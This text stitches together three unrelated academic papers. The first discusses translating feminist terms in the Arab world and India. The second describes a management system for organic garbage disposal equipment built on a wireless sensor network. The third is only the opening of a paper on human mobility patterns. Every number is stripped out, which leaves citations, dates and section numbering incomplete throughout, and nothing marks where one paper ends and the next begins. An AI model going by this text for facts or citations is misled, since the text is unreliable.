instigating social change: translating feminism in the arab world and india, qscience connect (special issue on translating the gulf: beyond fault lines) :tii. http://dx.doi.org/ . /connect. .tii. http://dx.doi.org/ . /connect. .tii. submitted: july accepted: december ª alsharekh, licensee hbku press. this is an open access article distributed under the terms of the creative commons attribution license cc by . , which permits unrestricted use, distribution and reproduction in any medium, provided the original work is properly cited. women’s study and research center, kuwait university *email: aalsharekh@gmail.com introduction in a broad sense, feminist theory and feminism have been institutionalised in the west, and have garnered credibility through the different scholarly approaches that have interacted with and built upon the canon. as a social and political movement it has a clearly delineated trajectory, with the emergence of manifestos that demanded equal rights for women, by women, around the tail end of the th century in europe. the indian experience entailed similar demands for a change in the status of women around the end of the th century, but like arab feminism, this had its roots in both colonialist demands for an end to ‘barbaric’ practices against women, and a newly educated male elite that wanted to improve the condition of women but not necessarily emancipate them. so calls for educational reform in india were in a similar vein to qasim amin’s call for educating the “mothers of the nation” in egypt (amin, ) this brings us to the two main ideas that will be discussed in this paper; firstly that the translation of feminist texts in india and the arab world involves the invention of new terms and terminologies that are introduced alongside the translated concepts. this process is compounded in both regions by the post-colonial baggage of the feminist movement, and its early adoption by men who had different agendas than the feminists themselves. secondly, translators in both regions become active instigators of social disruption, and can either hold back, or expedite the dissemination of feminist ideas and their absorption into the local culture through the terminology they choose to use, and whether it is a “faithful” meaning literal, or a “grounded” meaning practical, translation as j. devika named them (devika, ). in the same way that bassnett and trivedi argue that “translation does not happen in a vacuum, but in a continuum..[as] part of an on-going process of intercultural transfer” (bassnett & trivedi, , p. ), feminist translation develops both from the theory of gender biased responses, and the activism side of the movement. therefore it is in a constant state of flux, absorbing and building on developments in the socio-political sphere. re-examining juliet mitchell’s description of feminism as “the longest revolution” (mitchell, ) in the context of translation, we would find revolutions within the feminist tract itself. while the position of euro-centric feminists centred on the assumption of the universal suppression of women, with first and second wave feminists likening their position to that of other disenfranchised groups, “the jews and the blacks” as simone de beauvoir put it in the second sex (de beauvoir, , p. ), later waves revolted against this idea of a uniform female experience. 
while marxist feminists were in revolution against the social hierarchies inherent in first wave arguments, feminists of non-white ethnicities were in revolt against the insidious racism of white feminist discourse. the translator of feminist tracts, in dealing with multiple layers of feminist ideology and cultural meanings, can also be placed as a direct agent of this feminist revolution. especially since those translating feminist concepts are likely to also be those who are engaging in feminist acts, at the very least, in gynocriticism. the canadian poet and translator erin moure argues that, “choosing what to translate is a political act, it’s a community act. it’s an act that’s culturally constructed” (moure, ) but translating in the arab world and india is, to quote spivak ( ) “often a political exercise of a different kind” (p. ). in both regions the translator is dealing with a multitude of ethnically different political and cultural ideologies that have brushed up against global ones and embraced them at a point in time, such as communism in the south of the indian subcontinent, and the socialist regimes in iraq, syria and egypt. both regions have a high formal language and different dialects that act as everyday languages coloured by geographical influences outside its borders. both are especially hostile to feminist intervention and have been accused of backward practices by western observers since the beginning of the state formation project in the s and s. of course, india’s size, population and industrial prowess places it far ahead of the arab middle east in terms of the sheer volume of feminist output, and the national recognition of a leadership figure in indira ghandi, although it has yet to be repeated again, places it in a more advanced cognitive space in feminist terms than the arab-speaking world. the homogeny of india as a subcontinent is also markedly different than the many arab identities that make up the twenty-one countries of the arab world, especially after the post-liberation statehood projects began to get involved in the national identity manufacturing process. the latter meant that the legal and social position of women progressed at widely differing rates in the various arab countries, and thus produced a varying range of engagements with feminist thought, texts and translations. lastly india has established matrilineal and supposedly matriarchal societies (such as the khasis of north east india and the now no longer practiced marumakkathayam inheritance system in kerala) whereas the arab states have no such practices in their socio-cultural history. page of alsharekh. qscience connect :tii. translating a universal struggle according to jeremy munday ( ) feminist engagement with the act of translation has focused on four main concerns (p. ). the first, which both indian and arab writers have not engaged with enough, centers around uncovering the role of female translators themselves and their historical limitations. however the dearth of academic texts on the issue of female translators can be compensated by arab writers such as fatima mernissi’s attempts to challenge the traditional historical relegation of women to the side-lines with books such as the forgotten queens of islam (mernissi, ), and the many anthologies and volumes written on uncovering the misrepresented history of women in india. 
this ties in with the second concern, which attempts to dismantle the ideological and historical correlation of translation with traditional gender construction, so that the feminist translator is not only instigating social change but uncovering the traditional reasons behind the status quo, and much of the third concern, that of critiquing the translation of feminist texts falls into this category. the last concern, that of gendered language and choosing what gender biases and societal practices to omit or include in a specific text is perhaps the one that the post-colonialist feminist translator in the arab world and india struggles with most. the problem with traditional feminist translation theory is in its insistence on the lowly status of both feminism and translation. sherry simon ( ) saw that the literary view on translated texts as derivative of and inferior to the original text is similar to how women were repressed and relegated to a less prominent role in society and literature. she advocated an adherence to a feminist translation project by which “feminist translators openly advocate and implement strategies (linguistic or otherwise) to foreground the feminist in the translated text.” (hatim & munday, , p. ). this leads to what lori chamberlain ( ) calls the “sexualisation of translation” and requires the translator and the original author to engage in a subversive collaboration to restore or uncover the hidden feminist message that has been previously suppressed. here the translator, who these theorists argue is lesser than the creator of the original text, is able through the act of translation to undermine the sexist marginalisation and engage in the creative process of “liberating” the feminine, much like the social act of women’s emancipation. although both translators of feminist texts in india and the arab world cannot avoid a form of this re- inventive process the idea of starting off from an inferior position (that of woman, or that of translator) can get prickly in a post-colonial setting, where the sensitivities towards this type of cultural positioning can run especially high. chakravarty ( ) states that: yet, this overlooks the fact that a preoccupation with “fidelity” or “authenticity” was not part of the tradition in india before colonial times. ours was a polyglot culture with a strong oral tradition, and linguistic and regional borders were fluid; in this scenario, it was inevitable that texts should travel in translation (p. ). this description also works for the nature of translation in the arab world. in fact, there was no belief in the inferiority of the translator, who was seen as an essential vessel to transmit a foreign culture’s knowledge into arabic whether at the time of the islamic empire expansion, or during colonial occupation when the printing presses allowed for a wider dissemination of western texts (al-khalili, ). as women in both india and the arab world continue to explore feminist texts and translations, the lack of organic and home-grown feminist translation theories will be supplanted and replaced by those starting from a viewpoint that is more authentic and less concerned with the western perception of translation and more concerned with the “fluidity” of texts in regions historically immersed in multi-cultural exchanges. 
feminist perceptions in translation examining the translated choices in the arabic language and in india’s regional languages gives us a vivid example of this protracted wrangling between translating the social act and actually engaging in social action. feminism is deeply rooted in social service and social justice, and therefore contains an implicit invitation to overthrow existing social systems that are oppressive to women as a weaker social group. the universal application of the gender issue frames the national in the international, the personal in the political, thereby making the implicit call for action, an explicit one. feminism’s disruptive properties in traditional indian and arab societies caught up in preserving “family values” that centre on inherited sexual hierarchies and gender roles can be seen in its challenging of attitudes, behaviours, laws, policies and institutional frameworks that seek to keep women occupied within a rigidly controlled domestic space. in the shift from source to translated page of alsharekh. qscience connect :tii. language feminism’s focus on inclusion, fairness and equal opportunity and it’s challenges to notions of manhood, gender, language and family are subjected to critical analyses by the interpreter. as simon ( ) put it “complicities between gender and translation become the basis of a consciously transformative project” (p. ). those working in gender studies in india and the arab world are viewed as dealing with a “western” concept with an imperialist agenda; corrupting the cultural and traditional value system of the indigenous heritage of the region. the cultural rejection of feminist discourse derives a lot of its power from labeling it an “imported” problem. linguistic resistance to this field is one of the more obvious impediments to its progression, with a range of dissatisfactory and often conflicted terminology meant to distance the language from the very concept of feminism. the arabic “nissawiya” or “unthawiya”, both provide incomplete descriptions of feminism as they focus on the biological aspect and disregard the more encompassing feminist “world view”. when figures such as alice walker reject “feminism” as a white women’s term and replace it with womanism, this creates an ever-larger dilemma for the translator by forcing them to take a side in the on-going debate . . . which arabic “iya” to go with which english “ism”? the indian term “streevadam” is a similar reduction to the literal meaning of “argument on behalf of women”, which fails to convey the spectrum of feminist concerns. devika ( ) argues that both the emphasis on literal interpretations and the conservative nature of the local community which “discourages the active discussion of themes like sexuality, very often decides the limits of feminist innovation in language” (p. ). this becomes more complicated as developments in western feminism push the limits of linguistic and cultural flexibility further with concepts such as “intersectionality”, “gender-queer” and “femi-nazi”, which may not be suitable or useful in the current social climate of the target language. the burden of translation at present, the field of gender studies seems to be in a translation transition. devika ( ) claims that the word “gender” started to appear in the popular discourse of indian development and decentralisation in the s, as it was seen as less divisive than feminism. the most commonly used term, “lingapadavi”, merely means “the status of sex”. 
in india and the arab world, naming the field of gender studies is a problem in itself because sex as a socio-cultural issue and sex as biologically determined were rarely considered as separate enough to merit different words before the advent of translated feminism. al-dabbagh and ramadan ( ) make the same claim for the use of “gender” as a less divisive term in the arab world, and explain how many arab feminists rejected it because of this shift in focus from women to the more inclusive “women and men”. as more and more universities and independent researchers in the arab world engage with the study of gender and feminism, the usage will probably evolve and normalise so that its not as alien-sounding as saadalbazie’s ( ) suggestion “jinthawiyah”, or the more common obtuse term “al-no’a al ijtima’ee”, or the lazy and odd sounding “jandarah”. spivak ( ) examines the awkwardness and relative novelty of the words gender and gendering in the english language itself, and quotes the bangladeshi activist and author farida akhter as complaining that “the real work of the women’s movement and of feminism is being undermined by talk of “gendering”, mostly by the women’s development wings of transnational nongovernment organisations, in conjunction with some local academic feminist theorists” (spivak, , p. ). similarly, the united nations programs have tried to push the word “jinsaniyah” as the arabic version of gendering, a mixture of the word for humanity “insanniyah” and that for sex “jinss”, and it has so far resisted adoption outside of the organisation. besides the different psychological burdens of post-colonialism that indian and arab feminist discussions start off from, there is the obvious gap in theoretical background. although there has been many interesting and valid publications in the past four decades that dealt with comparative, islamic and the unfortunately named third world feminism, the main theoretical underpinnings of mainstream feminist thought and critical approaches comes from two western, liberal humanist schools of thought; anglo-american feminism, which deals mostly in biology, and the french feminist school, which divorces feminism from the biological state of womanhood, so that both men and women can be feminist in their writings and their outlook. both approaches rest on the exaltation of the culture of the individual, and individual rights, which is problematic when dealing with cultures where collectivism, and communal harmony are the ideological basis such as india and the arab countries. this can make the most simplistic of feminist exchanges lose their meaning, and makes it difficult to translate even the most basic concepts that are essential to the feminist theoretical lexicon, like the word “patriarchy”. page of alsharekh. qscience connect :tii. patriarchy, in its etymology, has greek roots, and in social relevance, is associated with the orthodox christian concept of an ultimate father, a “patriarch”. in an increasingly secularised west, institutionalised control based on male authority, like that exercised by the church over its faithful followers, is easily accessed in “patriarchy’s” metaphoric repressive and restrictive elements. however, when one uses this word in arabic, its christian overtones lose their oppressive suggestive powers and become another manifestation of “foreignness” outside the minority of arab christians who engage daily with the term. 
patriarchy, which is central to the universal themes of hierarchical and institutionalised male dominance, is often translated into the more arabic-sounding "abbawiyah" or "thukooriyah", derived from the arabic words for father and male respectively. at any time, when the translator designates who is meant by patriarchy, it is inevitable that he or she is also designating an enemy. the "patriarch", be he the father, the male sex or the foreign-sounding and vehemently christian patriarchy, has now been named and shamed in the translated arabic as the root cause of female oppression. another kind of ethical dilemma emerges for those translating the same term in the different regions of india. should patriarchy be translated into high language, like the malayalam term "pitrmedhavitvan", with its upper-caste social implications, or alternatively into the more accessible and socially egalitarian "aankioma"? as devika ( ) points out, high malayalam is deeply influenced by sanskrit and divorced from everyday speech, similar to the problems of translating feminist terminology into classical arabic, without even addressing the linguistic minefield for a feminist translator in the inherent favouring of the male sex in the grammar of the language itself. this problem of the sexist nature of language itself has been faced by those outside the field of feminist translation, but more recently, scholars from the arab world and india have started to explore this relationship and its impact on the social contract and gender roles. fatima sadiqi ( ) argues that language is an important component of social power that often works in ways that undermine female empowerment. the same argument for this inherent gender bias has been made by both indian and western scholars, with varying degrees of argumentation on how much this then affects the socio-political positioning of women within a particular linguistic community.

cultural dominance and feminist translation

part of the feminist activist and translation movement has attempted to co-opt the overarching male subtext of literary tracts by having dedicated publishing houses look into the lost "feminist" text. kothari ( ) suggests that: a more tangible interlocking of gender and translation is visible in "small" and "niche" presses focusing upon women's texts. in india, stree and kali for women undertake translation on a wide scale as a means to access women's voices (p. ). similarly, noor publishing house in egypt was dedicated mainly to the output of female authors, and was the organising impetus behind the arab women writers' book fair in cairo. valentine moghadam ( ) argues that publications such as al-raida, a quarterly feminist journal published by the institute of women's studies in the arab world at the lebanese american university, which has been operating since , are "another way that mena women have been contributing to civil society . . . through literary efforts, including the publication of books, journals and films" (p. ). in the arab world, western interest has focused on women's writing specifically, perhaps as a result of the orientalist infatuation with the "oppressed" female figure, and this has resulted in many translated feminist novels and anthologies dedicated to arab women's writing (boothe, , p. ). yet even this can be a thorny issue, because the choice of which writer to translate can be driven by commercial or sensational motives that may not always have an essentially arab feminist concern.
garnet publishing house in london dedicated a series of publications edited by fadia faqir dedicated solely to arab women writers, and although she argues that western interest and exposure is ultimately a good thing, amal amireh ( ) argues that there is an element of cultural domination involved in translating feminist works: to understand the problem arab women writers face we need to look at the long and complex history of their reception in the west. historically, the west’s interest in arab women is part of its interest in and both words mean patriarchy in malalayam, according to j. devika ( ): “aankioma is now widely used in malayalam for patriarchy, as an alternative to pitrmedhavitvan. in a sense this is really the implicit recognition of the impossibility of homolingual address assumed by much translation - of the fact that the presence of a national language does not mean it is equally available to all nationals alike.” page of alsharekh. qscience connect :tii. hostility to islam. this hostility was central to the colonialist project, which cast women as victims to be rescued from muslim male violence. the fixation on the veil, the harem, excision, and polygamy made arab women symbols of a region and a religion that were at once exotic, violent, and inferior. (p. ). this holds true for the darling of western translation nawal al saadawi’s work, and especially her fiction which is often described as subpar by her peers and other arab women writers. spivak ( ) warns of this desire to be all-embracing as a feminist translator, cautioning that a good translator “must have a tough sense of the specific terrain of the original, so that she can fight the racist assumption that all third world women’s writing is good” (p. ). the colonial context challenges the universality of feminist translation in another way. spivak ( ) argues that it is not always empowering to the feminist writer to be pigeonholed into a cultural space through the medium of translation: “i am often approached by women who would like to put devi in with just indian women writers. i am troubled by this because “indian women” is not a feminist category . . . there is an ethnocultural agenda, an obliteration of third world specificity as well as a denial of cultural citizenship, in calling them merely “indian” ” (p. ). this also holds true for many arab women writers who write in english and french and yet cannot be seen as part of a western cannon. yet, spivak and others in the postcolonial feminist field examined how translation could become a vehicle of feminist solidarity. by engaging in the act of translation in a linguistic and ideological vacuum the translator becomes an active agent in developing and shaping target language concepts associated with feminism, while simultaneously conveying the social and moral values that are associated with the quest for female empowerment in the west. this burden of feminist creation was used to counter accusations of being mere vessels of a racist system that uses women’s issues to attack local culture and traditions. essays like “why kali wont rage” (banerji, ) and leila ahmad’s arguments on colonialism and islam (ahmed, , p. 
) attempted to re-address the feminist position by offering alternative narratives to the colonialist emphasis on backward practices in the colonies, such as the emphasis on the practice of sati (the funeral ritual of widow suicide by burning) in india, or through exposing the hypocrisy of lord cromer’s pro-female emancipation position in egypt while he headed the anti-suffragette league in britain. decades later these same issues are still being challenged and re-addressed by arab and muslim feminists in a post – , post-isil world, against the reductionism of what evelyn alsultany ( ) describes as “the politics of pity” and within the messy ethics of cultural relativism when the plight of women continues to be highlighted by invading western forces like the us presence in afghanistan (abu-lughod, : p. ). conclusion: post-post colonist approaches “translating feminism” was the subject of a public conversation that took place at the moma new york in november . artists and activists from latin america, poland and india were brought together to discuss how feminism has often been derided as a bourgeoise pursuit, out of touch with more urgent concerns in the context of political oppression and dictatorship. equally in the arab world and india, there is a sense of frivolity and privilege associated with feminism in an impoverished and political unstable part of the world. pandey ( ) argues that for indians “where inequality has been institutionalised in a hierarchal manner, the concepts of individual equality and freedom are new and being offered from above” (p. ), and the same high brow accusation has been levelled at arab feminist scholars such as nawal al saadawi and fatima al mernissi, who find much more credibility and respect in the west than in the arab world as experts in their field. researchers from the global south, another unfortunate sweeping name, tried to engage with latino, african and asian discourses that dismantle the idea that feminism is purely an imported western concept (though as this essay proves, it is nearly impossible to have a south-south dialogue that doesn’t in some way reference a “northern” theoretical base). audre lorde’s ( ) famous essay on how the master’s tools will never dismantle the master’s house will continue to drive some aspects of indigenous and post-colonial feminism, but as grass-root movements take hold and those arguments are subsumed within the relentless internationalism that the world wide web forces on us, these concerns are starting to wane in importance. safar, the sikh feminist research institute seeks to promote and sustain sikh feminist “research, praxis and activism” through realising the “sikh gurus’ principles of egalitarianism and empowerment”. safar is based in canada and communicates mostly in english, further proof that to find an indigenous feminist rhetoric, or to re-write a more gender page of alsharekh. qscience connect :tii. balanced regional history undistorted through patriarchal practices, an engagement with the language or the tools of the other, of the west, is often necessary. another example of moving on from the constraints of post-colonial feminism is kohl, a new journal that engages with the body in arabic, french and english. kohl invites contributions that explore issues of gender and sexuality in the arab middle east even as the language and the region are not yet able to accommodate this conceptually evolved foray. 
estaygazat is an online syrian feminist platform that started in , that in spite of its anti-assad stance and its focus on protest, is being attacked as distracting from the main issues (gebeily, ). its discourses are condemned as shameful and emulating the west because it chooses to engage with the body as western feminists had done before. the evocative name “she has awoken” is part of what devika ( ) calls “retrieving . . . local terms or usages, or coining new ones . . . interpreting them in the light of western political ideas and concepts . . . and strategically deploying them in political discourse.” devika ( ) gives the example of a term coined by anna chandy “adukkalavadam” which can be roughly translated to “kitchenism”, an attempt at highlighting how “the emergent modern patriarchy in kerala allowed a degree of mobility to women and access to paid work, but essentially tied them to domestic concerns.” another example would be the favouring of the term “munadhilahhugoogiyah” by arab feminists, which simply means “rights activists”, rather than any of the agreed upon translations of the word feminist. two indian girls released a rap video in march which quickly went viral (which echoed a sarcastic youtube video by indian actresses called rape: it’s your fault), denouncing the complicity of the indian authorities in covering up incidents of rape (cohen, ). the girls focused on the use of the term “eve-teasing” in india instead of the more powerful and accusatory “sexual harassment” and this is the “grounded” activist feminism that awaits us while we struggle to find linguistic equivalents to the latest feminist trends. the act of naming and renaming is what turns feminist translation into activism in public life. in post arab spring egypt a similar debate was launched through the insistence of female protesters on discussing the issue of sexual harassment, bringing a formerly taboo subject into the light and forcing governments to legislate against it. it seems that young activists in the arab world and india have moved past the “triple bind” (jayawardena, ) created by male-centred imperialists, nationalists and religious revivalist discourse. these women are engaging in a post-postcolonial discourse that doesn’t seem as burdened with disentangling feminism from a historical relationship with the west. they seem to have made a clear distinction between the geographical state of feminists located in the post-colony, and the intellectual stand of postcolonial feminism, and wholly embraced being “in-translation”, which devika ( ) describes as the capacity to combine . . . [the faithful and grounded modes of translation] in politically fruitful ways”. this can be seen in the increasingly emboldened use of art-activism and social media tools to re-appropriate a space for women that is not dictated by male politicians or an over-burdened post colonialist feminist agenda. campaigns such as the blank noise project, started as a student project in a bangalore art school in and has since then developed into an international vehicle for “changing public attitudes towards sexual violence.” regardless of what local or translated terms we give them, the new wave of activists in india and the arab world seem to be the modern embodiment of cesar chavez’s words, “you cannot oppress the people who are not afraid anymore . . . we have seen the future and it is ours” (chavez, ). references abu-lughod l. do muslim women really need saving? 
anthropological reflections on cultural relativism and its others. am anthropol. ; ( ): – .
ahmed l. women and gender in islam. new haven: yale university press; .
al-bazie s. . youtube video. retrieved from https://youtu.be/skiprwil y
al-dabbagh m, ramadan a. translating "gender" in the arab world: implications for public policy (in arabic). idafat: arab j soc. ; ( ): – .
al-khalili j. the house of wisdom: how arabic science saved ancient knowledge and gave us the renaissance. london: penguin; .
alsultany e. arabs and muslims in the media. new york: new york university press; .
amin q. the liberation of women and the new woman: two documents in the history of egyptian feminism. (peterson s, trans.). cairo: the american university in cairo press (originally published in and ); .
amireh a. arab women writers' problems and prospects. al-jadid. ; ( ): – .
banerji r. why kali won't rage, a critique of indian feminism. gender forum. ; . http://www.genderforum.org/issues/passages-to-india/why-kali-wont-rage/
bassnett s, trivedi h. postcolonial translation: theory and practice. london: routledge; .
boothe m. egyptian women writers in english translation. in: classe o, ed. encyclopedia of literary translation into english: a-l. volume . chicago, il: fitzroy dearborn; : – .
chakravarty r. translating tagore: shifting paradigms. in: banerji d, ed. rabindranath tagore in the st century: theoretical renewals. new delhi: springer; : – .
chamberlain l. gender and the metaphorics of translation. signs. ; ( ): – .
chavez c. address to the commonwealth club in california, november . retrieved from http://www.chavezfoundation.org/_cms.php?mode=view&b_code= &b_no= &page= &field=&key=&n=
cohen c. #rapagainstrape: two indian women rapping about rape go viral. the telegraph, march . http://www.telegraph.co.uk/women/womens-life/ /rapagainstrape-indian-girls-rape-rap-video-has-gone-viral.html
de beauvoir s. the second sex. (borde c, trans.). new york: vintage books. (original work published ); .
devika j. being "in-translation" in a post-colony. transl stud. ; ( ): – .
gebeily m. meet estaygazat, syria's online feminist movement. al-monitor, march . http://www.al-monitor.com/pulse/originals/ / /syria-women-estayqazat-movement-sexuality.html
hatim b, munday j. translation: an advanced resource book. london: routledge; .
jayawardena k. feminism and nationalism in the third world. london: zed books; .
kothari r. translating india. london, uk: routledge; .
lorde a. the master's tools will never dismantle the master's house. in: sister outsider: essays and speeches. ( ) ed. berkeley, ca: crossing press; : – .
mernissi f. the forgotten queens of islam. polity press; .
mitchell j. women, the longest revolution. new york: pantheon books; .
moghadam v. modernizing women: gender and social change in the middle east. boulder, co: lynne rienner; .
moure e. translation is a political act. youtube video. retrieved from http://www.youtube.com/watch?v=bhv bnipbag
munday j. the routledge companion to translation studies. london: routledge; .
pandey i. romantic feminism in hindi novels written by women. house of letters; .
rape: it's your fault. youtube video. retrieved from https://www.youtube.com/watch?v= hc ng_ajpy
sadiqi f. women, gender, and language in morocco. leiden: brill; .
safar online. website: http://www.sikhfeministresearch.org
simon s. gender in translation: cultural identity and the politics of transmission. london and new york: routledge; .
spivak g. a critique of postcolonial reason: towards a history of the vanishing present. harvard university press; .
spivak g. the politics of translation. in: bal m, ed. narrative theory: political narratology. routledge; : – .
the blank noise project. srishti university website: http://srishti.ac.in/centers-and-labs/blank-noise

international conference on sensor network and computer engineering (icsnce )

organic garbage disposal equipment management system based on wsn

liu bocheng, school of software, nanchang university, nanchang, china, e-mail: jsjjcjx@ .com
cao ye, school of software, nanchang university, nanchang, china, e-mail: @ .com
song jialei, school of software, nanchang university, nanchang, china, e-mail: ncusc_bysj@ .com

abstract—cities produce a huge amount of organic garbage as urbanization develops rapidly, and garbage disposal equipment has been put into use on a large scale. traditional approaches to equipment management are no longer efficient. this paper focuses on realizing the informationization and systematization of equipment management through software technology.

keywords-garbage disposal; equipment management; sensor; wsn

this paper analyzed the requirements of the system and the related work processes. the system should be able to manage basic information about staff and equipment, receive data returned from sensors, and remind staff when equipment is abnormal. staff can set the operating status of equipment via the system. based on modular programming ideas, the paper then designed the functional modules: personnel management, rights management, equipment management, real-time simulation, task management and fault management. finally, the full functionality of the system was implemented, providing an information-based management approach for organic waste equipment, improving the efficiency of the staff and enhancing the modern management level of the enterprise.

i. introduction

through the system, staff can manage the equipment and tasks and monitor the real-time status of the equipment from a computer. this improves the efficiency of equipment management, reduces the enterprise's investment in human resources and promotes the informatization of management[ ]. the concept of informatization is gradually being applied to the management of garbage disposal equipment. according to analysis of the development trend of china's garbage disposal industry, waste treatment is gradually adopting high technology, and the level is getting higher and higher.
in the case of waste separation, the application of automatic equipment, landfill site construction and application of bioengineering technology to improve the efficiency of waste incineration power generation system through thermal physical heat transfer technology[ ]. the scale of equipment management is increasing and the complexity of management is improving. the traditional way of equipment management gradually does not meet the demand of production. network technology can effectively integrate resources and realize sharing, which is being applied to equipment management, thus improving operation and management efficiency[ ]. ii. system analysis a. system demand analysis the main purpose of the system is to improve the management efficiency of waste disposal equipment and realize the network management. the following requirements are summarized by the analysis of the system.  in order to facilitate user operation, it is necessary to provide a good operation interface. the interface design should conform to the basic aesthetics, the system response speed should be fast, and the operation process should be standardized and reasonable.  to set different permissions for different personnel roles so as to maintain the system security and run steadily.  it will be able to manage user information, such as adding, deleting and modifying user information.  it will be able to manage the basic information of the equipment, such as adding, deleting and modifying basic information of the equipment.  the operator can carry out task management, add tasks according to the arrangement, and can generate task reports and submit them to the administrator for review.  the operator can through the system to run the equipment parameters settings, such as equipment internal temperature, the humidity inside the equipment, power equipment, etc., so that the equipment will be in good running condition.  the operator can check the operation of the system in real time and monitor the equipment. mailto:jsjjcjx@ .com international conference on sensor network and computer engineering (icsnce )  in the case of equipment failure, the system can notify operators in different ways, such as sending text messages, page pop-up prompts, etc. b. system function analysis ) user management user can check their personal information and change their passwords. the administrator can manage user information after login, such as adding, deleting, modifying user information and modifying users' permission. ) task management administrators distribute tasks by the system, distribute them to executives, and review the submitted tasks. the task performer modifies the status of the task according to the progress of the task, and then submits the task or gives it to the next performer. ) equipment management the operator can manage the basic information by the system, such as add, delete, modify the basic information of the equipment, and can view the equipment operation manual, at the same time they can intuitively see location of the equipment through the map. ) device control the operator changes the operating parameters of the equipment, such as internal temperature, internal humidity and machine power, so as to control the operation state of the equipment and improve the operation efficiency of the equipment. ) real-time monitoring the operator can monitor the machine and check the running status of the machine in real time. 
) fault management system can detect the abnormality of the device and notify the operator via sms or webpage reminder, and the fault information will be added to the fault log. iii. system design a. overall system design the overall design of the system is to carry out the overall plan for the previous analysis, and provide concrete solutions for the realization of the system. the organic waste recycling operation management system not only needs real- time monitoring of the equipment, but also can manage the equipment and improve the working efficiency of the users. according to business function, business process, we design corresponding function and business logic design. and by analyzing the data and entity types involved in the system, the design of the database will be completed. b. system architecture the architecture of the software system is as follows. figure . system architecture view layer handles the interface presentation and user interaction. business layer handles the request sent by the user and returns the result of the request to the view layer. at the same time, you will get the data needed by the view layer by calling the persistence layer's mapper interface. persistence layer connects to the database, and the data will be processed by the mapper interface. c. system function design through the business analysis of the system, the system function is divided into the following contents according to the module. figure . function module the functions of each module are as follows: ) user permission management different users have different executable rights, and from the business logic, it needs to set different roles for different users, which is conducive to the system's safe and stable operation. international conference on sensor network and computer engineering (icsnce ) ) user information management manage user information, including add, delete, modify, and other basic operations. ) personal information view view all personal information and be able to change the password. ) equipment information management management equipment information, including adding, modifying, and deleting equipment information and other basic operations. ) equipment location view display the corresponding location on the map according to the device address. ) device running state setting. the user sets the internal humidity, temperature and power of the device during operation, thus making the device in a high efficient state of processing. ) single device monitoring simulates the data sent by the sensor and monitors the state of a single device in real time. the state parameters include the internal temperature of the device, the internal humidity of the equipment and the power of the equipment. ) district profile carry out statistical analysis of equipment quantity information in the area. ) warning prompt sending when the temperature, humidity or power of the device exceeds the threshold, the system will send a warning to the device owner via text message or the page pop-up box. ) fault information record when the device fails, the system records the specific fault information. the user needs to modify the status of the fault according to the fault. ) assignment of tasks the administrator arranges specific tasks through the system and pushes them to the executor. ) task management the user can update the status of the task in real time according to the task. when the task is completed, it can be submitted to the administrator for review or continued to be pushed to the next executor. 
ordinary users manage their own tasks, and administrators can manage all tasks. iv. system implementation a. holistic structure the system is managed by maven,and the required reference packages are placed in the pom.xml.first,we deploy the package structure according to the system function. the functions of each package are as follows.  com.ssm.controller contains the related classes of the spring controller.  com.ssm.entity contains the entity types associated with the project.  com.ssm.mapper contains the relevant interface files and corresponding xml files for the operation database.  com.ssm.service contains the service interface associated with spring.  com.ssm.serviceimpl is the implementation of the interface in com.ssm. service.  the mybatis package contains the configuration file sqlmapconfig.xml for mybatis.  spring packages contains spring-related configuration files, including the database configuration management file applicationcontext- dao.xml and view management configuration file springmvc.xml and spring security configuration file applicationcontent-security.xml.  db.properties is the connection profile for the database.。  log j.properties is the configuration file for the output log.  src/main/webapp contains the jsp pages and the imported javascript files. b. function implementation ) login inplementation input user name and password, the corresponding form will be submitted to the information to the spring security processing, if the information from spring security that match in the database information , it will be send to the corresponding user requests, load the corresponding menu resources, access to the system home page url. if it does not match to the corresponding information, redirect to the login page. spring security needs to implement this functionality, in addition to implementing the corresponding configuration in applications-security.xml. ) equipment management information user can view the information of the device, add, modify, delete, search, and export the required information to excel. after clicking the location button, the user can view the location of the device. the map uses baidu map interface to realize, click the geographical position button and then the location of the device and the device number information will be displayed on the map. ) employee management user can view the basic information of the employee and add, delete or find there information. you can also set the users’ role. and you can select the columns you want to export to an excel. the table uses bootstrap table to dynamically load employee information. international conference on sensor network and computer engineering (icsnce ) ) district profile click the district profile button, the map of the country will be displayed, and the depth of the color will be directly proportional to the number of devices. this part is mainly showing the distribution of the equipment from different regions of the country, it uses echarts to implement, and complete the drill down function of secondary map, click each province will enter the corresponding city’s information interface, each city’s information using a scatter diagram showing the number of devices. when the mouse is hovering over the provinces, the relevant devices amount will be prompted. ) lan monitoring user can check the temperature, humidity and power of the device, and the warning threshold, and modify or delete information of the device. 
click on the status button to view the real-time state of the device, and the real-time state data is simulated using the random number. the dynamic line chart is realized by echarts. the temperature, humidity and power data of the device will be transmitted to controller in real-time. if any abnormal data is found, the device will send sms messages to the equipment manager. sms prompts use the sms interface provided by the internet provider. ) task list users can categorize tasks according to the urgency of the task, and can delete task information and manage the tasks. ) fault log when a device fails, the system generates a fault log. user can check the fault information of the device and solve the state of the fault. v. conclusion the organic garbage disposal equipment management system achieves multiple functions such as the rights management, user management, equipment management, equipment monitoring, fault management and early warning, task management, and provides reference for garbage disposal equipment information management. the system generally operates normally and smoothly. graphical interactive interface is pleasing to the eye. it can respond quickly to various operations like addition, deletion, search etc. it can effectively improve the management efficiency of the equipment, optimize the business process, reduce the investment in management, and improve the modern management level of the enterprise. there are some deficiencies in the system, which need further improvement: ( ) the real-time monitoring part of the equipment uses the simulation data. in practice, it needs to receive the data sent back by the sensor. the integration will be realized in the follow-up work. ( ) when the number of devices is huge, the query speed of the system will be reduced. optimization of the query algorithm is needed to improve the response speed of the system. ( ) the regional general situation only counts the number of devices in different regions, and it could analyze more factors, such as equipment model, abnormal equipment, etc. references [ ] chi xun,wang baojie,study on composting treatment pattern of rural living organicwaste,journal of shandong agricultural university. natural science,china,vol. ,pp. - , [ ] hu shang-qin,hu guo,research on producing the alcohol from the organic garbage fermentation, st international conference on energy and environmental protection (iceep ),advanced materials research vol. ,pp. - , [ ] zhang xilin,study on the garbage disposal in urban park based on the circulation ecoomy theory,journal of anhui agricultural sciences vol. pp. - , , identifying multiscale spatio-temporal patterns in human mobility using manifold learning identifying multiscale spatio-temporal patterns in human mobility using manifold learning james r. watson, zach gelbaum, mathew titus, grant zoch and david wrathall college of earth, ocean and atmospheric sciences, oregon state university, corvallis, or, usa abstract when, where and how people move is a fundamental part of how human societies organize around every-day needs as well as how people adapt to risks, such as economic scarcity or instability, and natural disasters. our ability to characterize and predict the diversity of human mobility patterns has been greatly expanded by the availability of call detail records (cdr) from mobile phone cellular networks. 
